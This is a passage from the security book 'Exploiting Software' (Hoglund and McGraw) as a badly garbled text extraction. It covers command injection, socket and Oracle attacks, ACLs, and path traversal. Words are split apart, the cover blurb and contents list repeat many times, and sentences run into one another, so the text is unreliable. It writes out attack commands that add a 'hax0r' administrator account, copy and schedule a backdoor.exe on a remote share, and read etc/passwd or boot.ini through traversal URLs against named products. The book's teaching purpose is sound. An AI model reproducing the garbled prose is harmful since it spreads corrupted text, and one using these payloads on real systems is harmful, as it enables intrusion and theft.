t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e "C:\\WINNT\system32\\net.exe user hax0r hax0r /add" Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it sadd t he user t o t h e adm inist rat or gr oup : We can also Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

"C:\\WINNT\system32\\net.exe localgroup Administrators hax0r /add"

* Attack Example: Scheduling a Process with Injection On ce an account has b een add ed t o a m achine, it may b e possible t o schedu le jobs su bseq uent ly r em ot e machin e. Th e st andar d m et hod m akes u se of t he at u t ilit y. On Window s, an at t acker m ig em otofe Content sy st ems and t hen deploy a backd oor pr ogr am . I f an adm inist rat or session is •dr iv e t o t h e rTable h e at t acker sim ply issu es t he at com m and w it h t he r emot e com p ut er specif ied. •t ar get , t h en Itndex Expl oit ing Softw a re How to Br e ak Code

Here is an ex am ple of m apping a dr ive, p lacing t h e file, and sch ed uling it t o r un on a r em ot e t ar By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

C:\hax0r>net use Z: \\192.168.0.1\C$ hax0r /u:hax0r How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are C:\hax0r>copy backdoor.exe Z:\ fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. C:\hax0r>at \\192.168.0.1\C$ 12:00A Z:\backdoor.exe Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . At mid t hebook spell m way ill be casty. ou—and Becauseitofwill r emcer ot teainly p r ocedu re calls, com pu tters This m night ust - h,ave shock educat e y ou.Window Get t ing sbey ond he allow [ 7] rscr emipt ot ek id con t rol once an adm inist rat or session is est ablished. die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t [ 7]

Note that remote pr ocedure call ( RPC) gam es may com e to an abr upt end now th at the Blaster w orm has c to tak e this risk m ore ser iously.

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

All in all, sh ell com m and inj ect ion and r elat ed at t acks are ex t r emely pow er ful t ech niques. When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns

Technique: Plumbing Pipes, Ports, and Permissions Rev er se engineer in g

Pr ogr am s use m any m et hod s t o com m unicat e w it h ot her pr og ram s. The com m un icat ions mediu m Classic at t acks ag ainst serv er soft w ar e som et im es be lev er aged int o an ex ploit . So, t oo, can r esou rces t h at belong t o ot her pr ogr am s y o com mu nicat in g wit . Sur pr ising at t hacks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t

Local Sockets The t echn ical det ails of b uf fer ov er f low s A p r ogr am m ay open sock et s for com m unicat ion w it h ot her pr ocesses. Th ese socket s m ay n ot b e Root k it s use b y a hu m an u ser . I n m any cases w h en local sock et s ar e used, an at t ack er wh o alr eady has a syst can con t oist he socket and Theknser er preogr am m ay r ect ly ! ) a Ex p em lo i t in g S o ftnect w a re f illed wit h and t h e issue t ools, com con m cept s,s.and owvledg necessar y t(oincor b reak tsoft he w only t hin g t h at conn ect s t o t he sock et is anot her pr ogr am . Thu s, t he h um an u ser m asqu er ad ar e. anot h er pr ogr am ( an d a t r ust ed on e t o b oot ) . To au dit a syst em f or local sock et s, issue t he f ollow ing r equest :



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes –an sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are netstat fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om To f ind out w hich p rocess ow ns t h e sock et , use t h e follow ing comm and s: at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr1 ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t . lsof Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g # lsof at-i tcp:135 udp:135 Classic t acks ag ainst-iserv er soft w ar e COMMAND USER FD clien TYPE SIZE/OFF NODE NAME Sur pr ising atPID t acks ag ainst t soft warDEVICE e Tech dced niqu es 22615 f or crroot aft ing m 10u aliciou inet s inpu 0xf5ea41d8 t

0t0 TCP *:135 (LISTEN)

The t echn 22615 ical detroot ails of b11u uf ferinet ov er f0xf6238ce8 low s dced

0t0 UDP *:135 (Idle)

Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft e. 2 . w ar netstat

C:\netstat –ano

Active Connections

• •

Table of Content s

ProtoI ndex Local Address

Foreign Address

State

PID

0.0.0.0:0

LISTENING

772

0.0.0.0:0

LISTENING

4

0.0.0.0:0

LISTENING

796

0.0.0.0:0

LISTENING

4

Expl oit ing Softw a re How to Br e ak Code

TCP By Gr eg Hoglund ,0.0.0.0:135 Gar y McGr aw TCP

0.0.0.0:445

Pub lish er: Addison Wesley

Pub Dat e: February 17, 200 4

TCP

0.0.0.0:1025

I SBN: 0- 20 1- 786 95 -8 Pages: TCP 51 20.0.0.0:1029

TCP

0.0.0.0:1148

0.0.0.0:0

LISTENING

216

TCP

0.0.0.0:1433

0.0.0.0:0

LISTENING

1352

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are TCPint ru0.0.0.0:5000 0.0.0.0:0 976t he bad g uy s? fir ew alls, sion det ect ion sy st em s, and ant iv ir us soft war LISTENING e n ot k eep in g out What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. TCP 0.0.0.0:8008 0.0.0.0:0 LISTENING 1460 Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d TCP 127.0.0.1:8005 0.0.0.0:0 t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w antLISTENING t o p rot ect y our1460 sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . TCP 127.0.0.1:8080 0.0.0.0:0 LISTENING 1460 This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

* Attack Example: Breaking Oracle with Socket Attack When net w or k secur it y m ech anisms9ido n ot a w or k At9i t ack Or acle suppat port er t s ns st or ed p rocedur es. One f eat ur e of st or ed pr ocedur es is t he ab ilit y t o load DLL m odules and m ak e fu nct ion calls. This allow s a developer t o do t h ings lik e w r it e an en cr y pt ion lib in g libr ar y av ailable as a st or ed pr ocedu re. Using st ored pr oced ur es is a v C+ + , Rev an dert se henengineer m ak e t his pr act ice in lar ge ap plicat ion designs. Classic at t acks ag ainst serv er soft w ar e The Oracle 9 i ser v er list ens on TCP por t 153 0. The list ener exp ect s t hat Oracle w ill connect an d r Sur pryising ainst t soft load lib rar . Theratet acks is no ag aut h en tclien icat ion onwar t hise conn ect ion, so by m er ely b eing ab le t o conn ect t o a p er son can act as t he Oracle dat abase. Thus, an at t ack er can m ak e requ est s of t he syst em j us Tech niqu es f or cr aft ing m aliciou s inpu t Or acle dat abase w er e doing so. The result is t hat an an ony m ous user can cau se an y syst em call on t he r em ot e ser v er . Th is v ulnerab ilit y was discov ered by D avid Lit chf ield in 2002 af t er Or acle The t echn ical det ails of b uf fer ov er f low s fat ed " Unbr eak able" adv ert ising cam paign. [ 8] Root k it s [ 8]

Nev er thr ow r ock s at a w asp nest.

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Process Spawning and Handle Inheritance

A ser ver d aem on m ay sp aw n ( or " for k " ) a new p rocess for each con nect ed user. I f t he ser v er is r oot or adm inist rat or , t he new p r ocess w ill need t o be d own gr aded t o a nor m al user accou nt pr io execut ion. Handles t o open r esou r ces ar e som et im es inher it ed b y t he child pr ocess. I f a p rot ect e alr ead y open, t h e child p r ocess w ill hav e un fet t ered access t o t he r esou rce, per haps by accid en t show s how t his w or k s.

Figu r e 4 - 1 0 . D ia gr am of ch ild pr oce ss in he r it an ce of a pr ot e ct ed r esou is a t r icky p r oble m t h a t i s oft en car r i ed out in cor r e ct l y by de ve lop



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are This t y pe of at t ack is m ost useful as a p riv ileg e escalat ion met hod . I t r equ ir es an ex ist ing accou n fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? k now led ge of t h e open pipe. I n som e cases, code mu st be in ject ed int o t he t arg et pr ocess b y ad What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. shar ed libr ar y, per for m in g a r em ot e t hr ead inj ect ion , or possibly ov er flow ing a b uff er . By doing at ack t his e open handles sing les t h eir inst r uct Ext p lo ier t incan g Saccess o ft w a re loaded w it h exuamp of row ealn at t ack s, ions. at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t .

Permissions Inheritance and Access Control Lists (ACLs) This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt ar k id t r eat m en tencount f ound in hack book s, you w illprlearn t ACLs e die a com m only er m edany secu rit y ing mechanism . The oblemabou is t hat ACLs are ex t r em ely m anage. Th is is because set t in g u p coher ent ACLs inv olv es im ag in ing w hat ev er y in divid ual u ser users may w ant t o do w it h a giv en r esou r ce. Som et imes t h ings g et com plicat ed. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem ACLs ar e, in f act , so comp licat ed t hat t hey t end t o fail in pr act ice. Sim ply p ut , t h ey can not be pr When net w or k secur it y m ech anisms do n ot w or k m anaged, and secur it y f ails if it can not be m anag ed . ACLs are in var iably set in cor r ect ly , and com aud it in t ools Atgt ack patare t er requ ns ired t o k eep t r ack of set t in gs an d t o m anage t hem pr oper ly. I n ev it ably an incor rect ly config ur ed on some file or an ot her, and t his of fer s an at t ack oppor t u nit y . Rev er se engineer in g The secur it y descr ipt or of a pr ocess let s t h e OS k now w hen t he pr ocess can access a t arg et . Obj e secur Classic it y d escratipt acks t or arag e comp ederagain st art he ainst ar serv soft w e ACLs on a t arg et . When a child pr ocess is cr eat ed, in t he secu rit y descr ipt or ar e inh er it ed and ot her s ar e not . Th is can b e con t r olled in a v ariet y of How ev er ,prbecause t heag r esult com p lex it y,e pr ivileges m ay be g ran t ed t o t he ch ild un int ent ion Sur ising at t of acks ainsting clien t soft war Tech niqu es f or cr aft ing m aliciou s inpu t

Technique: Exploring The t echn ical det ails of bthe uf fer File ov er fSystem low s The f ile Root syst k item s of a p ublic serv er is a busy place. All k inds of d at a g et lef t ar ou nd, m u ch like w h aft er a bu sy dow nt ow n par ade, af t er w hich t r ash is st rew n all ov er t he st r eet s. The pr oblem w it h Ex pvlo i t in S o ft w a re is f illed wit ht ot hkeep e t ools, ceptcon s, fined. and kn ow ledg e necessar y t o b reak ser ers is gt hat t hey cannot seem t he con m ess soft w ar e. Som e sim p le t hing s can h elp. Tem por ar y f iles shou ld b e st ored in a secur e ar ea aw ay f rom pr yin Backu p f iles sh ould not b e lef t sit t ing ou t in t he op en f or any one t o snat ch up. I t 's all r eally a m a clean lin ess. But let ' s f ace it , soft w ar e can b e v er y sloppy ( perh aps a ref lect ion on t he slobs w e r e A t yp ical ser ver is u su ally a br eed ing gr ound f or gar bag e dat a. Copies get m ad e and t hing s get l Backu ps an d t em por ar y files ar e lef t ou t in t he open. Per missions on dir ect or ies ar en 't lock ed d o r esult , imag e pir at es can j ust b yp ass t he login t o a por n sit e and dir ect ly access com pet it or s' con locat ion t h at is left w r it able ends u p as a st ash point for illegal soft war e ( is y our sit e a w ar ez ser

y ou ev er logged in t o y our UNI X box an d discov er ed 1, 400 concur r ent d ow nloads of q uak e3 .iso Most sy st em adm inist rat ors hav e had somet hin g lik e t his h appen t o t hem at least on ce. I n general, ser ver soft war e u ses t h e file sy st em ex t ensiv ely. A Web ser ver in par t icular is alw ay s execut ing f iles on a sy st em . Th e m or e com p licat ed t he serv er, t he h ard er it is t o guar ant ee t h e s file sy st em . Th er e ar e m any W eb ser v ers out on t h e I nt ern et t h at allow at t ack er s t o r ead or ex ec on t he h ard d riv e! Th e code bet w een t h e pot ent ial det er m ined at t acker an d t h e file sy st em is sim challen ging lock beggin g t o be p ick ed. On ce an at t ack er gain s access t o y our st or ag e, y ou can b • Table of Content s at t ack er will m ak e good u se of it . •

I ndex

Expl oit ing Softw a re How to Br e ak Code Let ' s exp lor e all t he lay er s b et w een an at t ack er and t he f ile syst em . Sev er al basic at t ack pat t er n By Gr eg Hoglund , Gar McGras aw sim ply ask ing for f iles and get t ing t hem . At t he v ery least , t h e at t acker com mon ly used , ysuch k now som et hing abou t t h e st ru ct ur e of t he f ile sy st em, but t his is easy because m ost sy st ems ar cut tPub er lish imer: ages of one an ot her . Mor e adv anced t rick s can b e used t o get dir ect or y list in gs an d b ui Addison Wesley an unk now n f ile sy st em . Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

Attack Pattern: User-Supplied Variable Passed to File System Calls File dsyoes st em e eak v ery? How com mdo onatint acker soft war ap plicat m any user in put How sofcalls t w arearbr s meake sof t wion ar es. brI neak on pcases, ur pose? Why are is o sion specifdet y filenam esstand her dant at a. p rop is leads to a firconsum ew alls,ed inttru ect ion sy em s,otand iv irWit us hou softtwar e nerotsecur k eepitiny gcont out r tolhet hbad g uy s? classic v ulner w hereby an soft at t ack iousides p artamet er s er ints.o file syst em calls. What t ools canabilit be uysed t o b reak warer e?can Th isp ass bookvar p rov he answ Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Ther e ar e t w o m ain cat eg ories of inp ut - dr iv en at t ack s: Buf fer ov er flow s ar e t h e larg est and bes at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . at t ack ; inser t in g dat a in t o t r ust ed API calls com es in a close second. This at t ack pat t er n inv olves supp lied dat a t hat t r ick le t hr oug h sof t w ar e and get p assed as an arg um ent t o a file syst em call. This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he for m s of t h is at t ack inv olv e f ilenam es and d ir ect ory br ow sing . scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Filenames When net w or k secur it y m ech anisms do n ot w or k I f t he u ser - supp lied dat a is a f ilenam e, an at t ack er can simp ly alt er t he f ile n am e. Consider a log based on t h e nam e of a ser ver . Assum e a p opular chat pr ogr am t ries t o con nect t o an I n t er net a At t ack pat t er ns ( 192.168.0.100, f or exam ple) . Th e chat p r ogr am w ant s t o m ak e a log file f or t he session. I t f ir s a D NS sererv se er and doesinaglook up on t h e I P add ress. The DNS ser v er ret ur n s t he n ame ser ver . ex p Rev engineer Aft er ob t aining t he nam e, t he chat pr ogr am m ak es a log file called ser v er. ex ploit ed .com . LOG. C how an at t ack w ould exp loit t his? Classic ater t acks ag ainst serv er soft w ar e Con sider w ising h at h appens h e at tclien acker h aswar penet Sur pr at t acks if agtainst t soft e r at ed t h e DNS ser ver on t h e net w ork . Or, con sid at t ack er has t h e means t o p oison t he DNS cache on t he client com pu t er . Th e at t ack er now ind ire t he nam e niqu of t he ileaft v ia DNS nam e. tThe at t ack er cou ld sup ply a DNS r esp onse such as Tech es log f or fcr ingt he m aliciou s inpu server.exploited/../../../../NIDS/Events.LOG, p ossibly d est r oyin g a v alu able log file. The t echn ical det ails of b uf fer ov er f low s Root k it s Directory Browsing Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Assuwm soft aree.a Web applicat ion allow s a user t o access a set of r ep ort s. Th e pat h t o t he r epor t s d ir ect som et h in g lik e w eb/ user nam e/ r epor t s. I f t he u ser nam e is sup plied v ia a hidden field, an at t ack e a b ogus user nam e such as .. / . . / . . / .. / . . / WI NDOWS. I f t he at t ack er need s t o r em ove t he t r ailin g s /reports, t h en t h e at t acker can sim p ly in ser t enou gh char act er s so t he st r in g is t ru ncat ed. Alt e at t ack er mig ht ap ply t h e post fix NULL char act er ( %00) t o det er m in e w het her t h is t er m inat es t h e

Attack Pattern: Postfix NULL Terminator I n som e cases, especially w hen a scr ip t ing langu age is used, t he at t ack st r ing is su pposed t o b e post f ix ed w it h a NULL ch aract er . Using an alt ern at e r ep resent at ion of NULL ( i. e. , %00) may t ran slat ion occur rin g. I f st rin gs ar e allow ed t o con t ain NULL char act ers, or • r esult in a char Tableact of er Content s t he t ran slat ion does n ot au t omat ically assu m e a n ull- t er m inat ed st ring , t h en t he result ing st r in • I ndex can hav e mu lt iple emb ed ded NULL char act ers. D ep en ding on t he p arsing in t he scrip t ing Expl oit ing Softw a re How to Br e ak Code langu age, NULL m ay r em ove post fix ed dat a w hen an in ser t ion is t akin g p lace. By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley

Dif ferent f orm s of NULL t o t hink ab out in clu de Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? PATH%00 What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. PATH[0x00] Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om PATH[alternate representation NULL are character] at t ack , y ou m u st fir st lear n h ow r ealof at t acks really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he %00 scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Attack Pattern: Postfix, Null Terminate, and Backslash Rev er se engineer in g I f a st r ing isatpassed t hrainst ou ghserv a f ilt of wsom Classic t acks ag erersoft ar ee k ind, t hen a t erm inal NULL m ay n ot b e v alid . Using alt ern at e r ep r esent at ion of NULL allow s an at t ack er t o em bed t he NULL m idst r ing w hile post fSur ix ing t h e pratoper so t hclien at t ht esoft filt war er ise av oided. On e exam ple is a filt er t h at look s for a pr ising t acksdat agaainst t r ailin g slash ch aract er . I f a st r ing inser t ion is possib le, but t he slash m u st exist , an alt ern at e encoding Tech niqu of NULL es f orin crmaft idst ing r ing m aliciou may be s inpu used. t The t echn ical det ails of b uf fer ov er f low s On ce Root ag ain, k it ssom e pop ular for m s t h is t akes includ e Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

PATH%00%5C

PATH[0x00][0x5C] PATH[alternate encoding of the NULL][additional characters required to pass filt

Table of Content s *• Attack Example: Entrust and Injection •

I ndex

Expl oit Softw a reinj How to Bris e ak Code A r at hing er sim ple ect ion possible in a URL: By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

http://getAccessHostname/sek-bin/helpwin.gas .bat?mode=&draw=x&file=x&module=&locale=[insert here][%00][%5C]&ch How d oes sof t w are br eak ? How do at t acker s m ake sof t w arrelative e br eak onpath p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by ear badedguy br eak itsof t wtar f y ou p rot ectvar y our sof t of w ar omd of at This at t ack h as app witsht or egular y in hee.wIild. Thw erant e arteo m any iat ions t heisfrkin at t ack ,inygoua m u stt fir lear at tinacks really t . w ill u su ally r esult in a new e Spend shor amstou nt n of htow im er eal in ject g agare ainst Webcarr appied licatou ions discover ed . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

Attack Pattern: Relative Path Traversal

When net w or k secur it y m ech anisms do n ot w or k

Usu ally t he pat CWD f or a p rocess is set in a subd ir ect or y. To get som ew here mor e int er est in g in At t ack t er ns t he file syst em , y ou can supp ly a r elat iv e pat h t hat t rav erses out of t he cu rr ent dir ect or y and int o Rev ot her ore in t erest er ,semengineer in g ing subd ir ect ories. This t echniq ue saves y ou fr om h avin g t o supp ly t he fu lly qualified pat h ( i. e. , on e t hat st ar t s fr om t he r oot ) . A nice feat ur e of t h e r elat iv e pat h is t h a onceClassic y ou hitatt the r oot t h e serv file sy emw, ar adedit ional m ov es int o a par ent dir ect or y ar e ignor ed. acks agof ainst er stsoft This m eans t h at if y ou w ant t o m ak e su r e you st ar t f r om t he r oot of t he f ile sy st em, all y ou h av t o doSur is pr p ut a lar n umag ber of "clien . . / " sequences ising atge t acks ainst t soft war e int o t he inj ect ion . Tech niqu es f or cr aft ing m aliciou s inpu t I f youThe r CWD is ical t h ree levels e follow t echn det ails ofdeep, b uf fert hov er f lowing s r ed irect ion w ill w or k : Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

../../../etc/passwd

Not e t h at t h is is eq uiv alent t o



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e ../../../../../../../../../../../../../etc/passwd Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Som e comm on inj ect ions t o t h in k abou t includ e Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

../../../winnt/ ..\..\..\..\winnt

../../../../etc/passwd ../../../../../boot.ini



Table of Content s



I ndex

* Attack Example: File Traversal, Query String, and HSphere Expl oit ing Softw a re How to Br e ak Code

These ar e sim ple ex am ples, b ut t hey illust rat e real- w or ld at t ack s. I t 's t ru ly ast onishing t hat v uln By Gr eg Hoglund , Gar y McGr aw like t his exist . Pr oblem s like t hese g o t o show t h at Web dev eloper s ar e usually f ar less aw ar e of coding and design t han r eg ular C pr ogr am m er s. Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are http:////psoft.hsphere.CP//?template_name=../../etc/passwd fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om t ack , y ou m u st fir stFile lear n h ow r eal atQuery t acks are reallyand carr ied ou t . *atAttack Example: Traversal, String, GroupWise This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he I t is in t er est in g t o n ot e t hat t his at t ack r equ ir es a p ost fix NULL: scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g http:///servlet/ webacc?User.html=../../../../../boot.ini%00 Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t

* Attack Example: Alchemy Eye Network Management Software File System The t echn ical det ails of b uf fer ov er f low s Web applicat ions of all shap es an d sizes suf fer fr om t his pr oblem . Most ser ver soft war e d oesn' t h Root k it s pat h t r av er sal p rob lem , b ut in som e r are cases one can find a sy st em t hat per for m s no filt er in g We can dow nload files using t he follow in g HTTP com man d: Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

GET /cgi-bin/../../../../WINNT/system32/target.exe HTTP/1.0

On ce t his w as r ep or t ed , t he com pan y fix ed it s ser ver . How ever , as w it h m any sit uat ions lik e t his w as not r ep aired comp let ely . An alt er nat iv e w ay t o car r y out t he sam e at t ack in volv es a URL suc •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

GET /cgi-bin/PRN/../../../../WINNT/system32/target.exe HTTP/1.0 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

This alt er nat iv e at t ack is a good ex am ple of w hy d et ect ing " bad inp ut " can b e diff icu lt . Black list as g ood as wh it e list in g. How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ewt alls, ru sion ionion sy stalso em s, antaiv PHP ir us soft n ot kint eep g out The arg etint soft w ar edet in ect quest prand ovides scripwar t - dre iven er in face t o at he netbad w orgkuy ms? anage What t ools canallow be ussed t o t back reak war e?eTh is book t he answ er s. pr ogr am t hat an at er tsoft o r et r iev files dir ectplyrov ovides er HTTP: Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem http://[targethost]/modules.php?set When net w or k secur it y m ech anisms do n ot w or k _albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../. At t ack pat t er ns /hosts Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e

* Attack Example: Informix Database File System Tech niqu es f or cr aft ing m aliciou s inpu t We w ould be rem iss if w e f ailed t o t hr ow a popu lar dat ab ase in t o t h e Hall of Sham e. Tr y t his ou t The t echn ical det ails of b uf fer ov er f low s I nf orm ix dat abase: Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

http://[target host]/ifx/?LO=../../../etc/

Technique: Manipulating Environment Variables Anot h er com m on sou r ce of in put t o p rog r ams ( and one t h at is of t en ov er look ed) is en vir onm ent an at t acker can cont r ol env iron m en t v ar iab les, t h e at t acker can oft en cause ser ious h ar m t o a pr •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code

Attack Pattern: Client-Controlled Environment Variables

